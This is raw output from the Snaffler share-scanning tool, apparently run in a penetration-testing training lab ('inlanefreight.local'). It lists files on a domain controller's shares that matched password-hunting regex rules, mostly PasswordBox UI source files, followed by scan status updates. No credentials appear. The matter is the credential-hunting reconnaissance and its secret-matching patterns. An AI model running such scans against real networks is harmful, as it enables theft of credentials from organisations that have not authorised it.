[File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|174.5kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Frontend\v3\AppDeployToolkit\AppDeployToolkitMain.ps1) move-Module\ -Name\ PSAppDeployToolkit\*\ -Force\n\$adtModule\ =\ Import-Module\ -FullyQualifiedName\ @\{\ ModuleName\ =\ \$moduleName;\ Guid\ =\ '8c3c366b-8606-4576-9f2d-4051144f7ca2';\ ModuleVersion\ =\ '4\.0\.5'\ }\ -Force\ -PassThru\ -ErrorAction\ Stop\n\n\#\ Get\ all\ parameters\ from\ Open-ADTSession\ that\ are\ considered\ frontend\ params/variables\.\n\$sessionVars\ =\ \$adtModule\.ExportedCommands\.'Open-ADTSession'\.Parameters\.Values\ \|\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:35Z [File] {Green}<KeepNameContainsGreen|R|passw|22.4kB|2025-05-01 16:09:13Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui\Controls\PasswordBox\PasswordBox.xaml) PasswordBox.xaml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:35Z [File] {Green}<KeepNameContainsGreen|R|passw|8.3kB|2025-05-01 16:09:13Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui\Controls\PasswordBox\PasswordBox.cs) PasswordBox.cs [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:35Z [File] {Green}<KeepNameContainsGreen|R|passw|4kB|2025-05-01 16:09:13Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui\Controls\PasswordBox\PasswordHelper.cs) PasswordHelper.cs [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:37Z [File] {Green}<KeepNameContainsGreen|R|passw|8.3kB|2025-05-01 16:09:13Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui\Controls\PasswordBox\PasswordBox.cs) PasswordBox.cs [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:37Z [File] {Green}<KeepNameContainsGreen|R|passw|22.4kB|2025-05-01 16:09:13Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui\Controls\PasswordBox\PasswordBox.xaml) PasswordBox.xaml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:37Z [File] {Green}<KeepNameContainsGreen|R|passw|4kB|2025-05-01 16:09:13Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui\Controls\PasswordBox\PasswordHelper.cs) PasswordHelper.cs [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:39Z [File] {Green}<KeepNameContainsGreen|R|passw|797B|2025-05-01 16:09:10Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui.Gallery\Views\Pages\Text\PasswordBoxPage.xaml.cs) PasswordBoxPage.xaml.cs [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:39Z [File] {Green}<KeepNameContainsGreen|R|passw|1.7kB|2025-05-01 16:09:10Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui.Gallery\Views\Pages\Text\PasswordBoxPage.xaml) PasswordBoxPage.xaml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:40Z [File] {Green}<KeepNameContainsGreen|R|passw|378B|2025-05-01 16:09:09Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui.Gallery\ViewModels\Pages\Text\PasswordBoxViewModel.cs) PasswordBoxViewModel.cs [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:40Z [File] {Green}<KeepNameContainsGreen|R|passw|378B|2025-05-01 16:09:09Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui.Gallery\ViewModels\Pages\Text\PasswordBoxViewModel.cs) PasswordBoxViewModel.cs [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:41Z [File] {Green}<KeepNameContainsGreen|R|passw|1.7kB|2025-05-01 16:09:10Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui.Gallery\Views\Pages\Text\PasswordBoxPage.xaml) PasswordBoxPage.xaml [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:41Z [File] {Green}<KeepNameContainsGreen|R|passw|797B|2025-05-01 16:09:10Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\lib\wpfui\src\Wpf.Ui.Gallery\Views\Pages\Text\PasswordBoxPage.xaml.cs) PasswordBoxPage.xaml.cs [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:48:25Z [Info] Status Update: ShareFinder Tasks Completed: 0 ShareFinder Tasks Remaining: 1 ShareFinder Tasks Running: 1 TreeWalker Tasks Completed: 7648 TreeWalker Tasks Remaining: 17 TreeWalker Tasks Running: 17 FileScanner Tasks Completed: 20610 FileScanner Tasks Remaining: 20 FileScanner Tasks Running: 20 82.7MB RAM in use. ShareScanner queue finished, rebalancing workload. Insufficient FileScanner queue size, rebalancing workload. Max ShareFinder Threads: 0 Max TreeWalker Threads: 21 Max FileScanner Threads: 39 Been Snafflin' for 00:05:00.0156749 and we ain't done yet... [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:48:25Z [Info] Status Update: ShareFinder Tasks Completed: 1 ShareFinder Tasks Remaining: 0 ShareFinder Tasks Running: 0 TreeWalker Tasks Completed: 7665 TreeWalker Tasks Remaining: 0 TreeWalker Tasks Running: 0 FileScanner Tasks Completed: 20630 FileScanner Tasks Remaining: 0 FileScanner Tasks Running: 0 82.7MB RAM in use. Insufficient FileScanner queue size, rebalancing workload. Max ShareFinder Threads: 0 Max TreeWalker Threads: 22 Max FileScanner Threads: 38 Been Snafflin' for 00:05:00.0312704 and we ain't done yet... [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:48:25Z [Info] Finished at 8/12/2026 10:48:25 AM [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:48:25Z [Info] Snafflin' took 00:05:00.0312704 Snaffler out.